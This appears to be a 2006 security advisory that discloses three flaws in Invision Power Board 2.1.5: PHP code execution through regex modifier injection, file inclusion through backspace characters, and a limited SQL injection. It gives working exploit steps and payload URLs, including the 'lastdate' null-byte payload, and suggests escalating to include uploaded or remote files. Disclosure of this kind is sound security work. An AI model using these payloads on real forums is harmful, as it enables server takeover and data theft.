Invision Vulnerabilities, including remote code execution

2006-04-27 / 2006-04-28
Credit: IceShaman
Risk: High
Local: No
Remote: Yes
CWE: N/A

Several Invision Flaws (2.1.5 and possibly earlier) --------------------------------------------------- IceShaman & Wells HackThisSite.org 1) Code execution sources/action_public/search.php line 1261 $this->output = preg_replace( "#(value=["']{$this->ipsclass->input['lastdate']}["'])#i", "\1 selected='selected'", $this->output ); The input string is not properly sanitized which can lead to arbitrary code execution. Example exploit: - Post in a forum with "eval(die()); //" somewhere in the body of the post - Use the search form to find text die just by your username (so only one result shows) make sure "Show results as posts" is selected. - Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return - The code should have been executed The lastdate string alters the regex to accept anything inside eval() and parse it as code, as an #e modifier is added and then %00 used which will be parsed as a null byte and truncate the string thus removing the original )#i part. Due to selected='selected' also being executed as php code a space and // has to be used to turn the text into a comment so it will be ignored by PHP. As you can see this is just the beginning. You can upload an avatar with php code somewhere in it and changed the above example to include() it thus running as much PHP code as you like. On default PHP setups you can also include() remote files. 2) Remote file inclusion (requires admin) sources/action_admin/paysubscriptions.php line 282 $gateway = trim( $this->ipsclass->input['name'] ); The input string is not properly sanitized and can be used to transverse directories in this later include on line 307: require_once( ROOT_PATH . 'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' ); This code may look safe as the prefix to the file is hardcoded, unfortunately the backspace character may be used to remove this prefix thus allowing ../../ combinations to execute code from any file ending in .php. Example: http://host/admin.php?adsess=...&section=content&act=msubs&code=install- gateway&name= %08%08%08%08%08%08%08%08%08/../class_gw_test The above is a simple POC which installs the 'test' gateway. %08 will be parsed as the backspace character, 9 of them are required to remove 'class_gw_'. Where as this is not a serious threat, someone with access to the system (shared server, with a /tmp directory?) who happened to gain/have access to the admin panel would be able to use this to run arbitrary code on the server in the correct circumstances. 3) SQL Injection (limited use) sources/lib/func_taskmanager.php line 70 $this->cron_key = substr( trim(stripslashes($_REQUEST['ck'])), 0, 32 ); The input from 'ck' is not sanitized which could lead to an SQL Injection (limited to 32 characters) on line 113: 'where' => "task_cronkey='".$this->cron_key."'", Example: http://www.host.com/index.php?act=task&ck=' Although this is limited to 32 characters, it still may pose a risk in certain circumstances. Flaws researched by IceShaman and Wells Flaw #1 was first discovered by "securicore" security group and used to exploit my forums. This led to me doing a quick audit of the code to find it (it goes without saying that I succeeded). - IceShaman


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top